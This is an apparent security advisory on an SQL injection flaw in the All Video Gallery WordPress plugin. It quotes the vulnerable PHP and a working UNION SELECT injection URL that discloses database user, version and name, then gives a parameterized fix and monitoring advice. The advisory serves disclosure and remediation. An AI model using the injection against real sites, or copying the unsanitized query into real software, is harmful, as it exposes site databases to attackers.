Advisory
Analysis of vulnerability
The All Video Gallery Plugin has two pages, playlist.php and /xml/playlist.php, both of which take a "vid" ID parameter and output the result of the resulting database query in XML format.
function buildNodes() {
    global $wpdb;
    // "vid" is taken straight from the request and concatenated into both queries
    $video = $wpdb->get_row("SELECT * FROM " . $wpdb->prefix . "allvideogallery_videos WHERE id=" . $_GET['vid']);
    $items = $wpdb->get_results("SELECT * FROM " . $wpdb->prefix . "allvideogallery_videos WHERE category='" . $video->category . "' AND id!=" . $_GET['vid']);
    $node = '';
    for ($i = 0, $n = count($items); $i < $n; $i++) {
        $item = $items[$i];
        $node .= '<item>'."\n";
        $node .= '<thumb>'.$item->thumb.'</thumb>'."\n";
        $node .= '<title>'.$item->title.'</title>'."\n";
        $node .= '<link>'.@add_query_arg( "slg", $item->slug, $_GET['page'] ).'</link>'."\n";
        $node .= '</item>'."\n";
    }
    return $node;
}
Note, however, that the "vid" GET parameter is never sanitized or cast to an integer before being concatenated into the query, which means that we can inject SQL into it and disclose information from the database by making a simple request to either of the pages, like this:
http://192.168.80.130/wordpress/wp-content/plugins/all-video-gallery/xml/playlist.php?vid=2 UNION SELECT 1, 2, user(), @@version, 5, 6, 7, 8, 9, 10, database(), 12, 13, 14, 15, 16, 17, 18
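The fix for this class of bug is to stop building the query by string concatenation. The following is an added example, not the plugin's own code or part of the advisory, showing how buildNodes() can be rewritten with WordPress's $wpdb->prepare() so that "vid" is bound as an integer and can no longer alter the query. It assumes it runs inside WordPress, where the global $wpdb object, $wpdb->prepare(), add_query_arg(), esc_html() and esc_url_raw() are available; the table name is interpolated because placeholders cannot be used for identifiers.

```php
<?php
// Added example (not the plugin's code): a parameterized version of buildNodes().
// Assumes the WordPress runtime: global $wpdb, $wpdb->prepare(), add_query_arg(),
// esc_html() and esc_url_raw() are all WordPress core functions.

function buildNodes() {
    global $wpdb;
    $table = $wpdb->prefix . 'allvideogallery_videos';

    // Cast the identifier to an integer first. A non-numeric "vid" such as
    // "2 UNION SELECT ..." becomes 2 (or 0) and matches only by id, instead of
    // changing the shape of the query.
    $vid = isset($_GET['vid']) ? (int) $_GET['vid'] : 0;
    if ($vid <= 0) {
        return '';
    }

    // $wpdb->prepare() binds the value; %d only ever expands to an integer.
    $video = $wpdb->get_row($wpdb->prepare(
        "SELECT * FROM {$table} WHERE id = %d",
        $vid
    ));
    if (!$video) {
        return '';
    }

    // The category comes from the database rather than the request, but it is
    // still bound with %s so a stored value containing a quote cannot break
    // the second query either.
    $items = $wpdb->get_results($wpdb->prepare(
        "SELECT * FROM {$table} WHERE category = %s AND id != %d",
        $video->category,
        $vid
    ));

    // "page" is also reflected into the XML output, so it is sanitized as a URL.
    $page = isset($_GET['page']) ? esc_url_raw($_GET['page']) : '';

    $node = '';
    foreach ($items as $item) {
        $node .= "<item>\n";
        // Escape every stored value before emitting it as XML text content.
        $node .= '<thumb>' . esc_html($item->thumb) . "</thumb>\n";
        $node .= '<title>' . esc_html($item->title) . "</title>\n";
        $node .= '<link>' . esc_html(add_query_arg('slg', $item->slug, $page)) . "</link>\n";
        $node .= "</item>\n";
    }
    return $node;
}
```

With this version the UNION request shown above returns either the playlist for id 2 or nothing, and the server log still records the odd-looking "vid" value, which is a useful signal to alert on from a web application firewall or log monitoring.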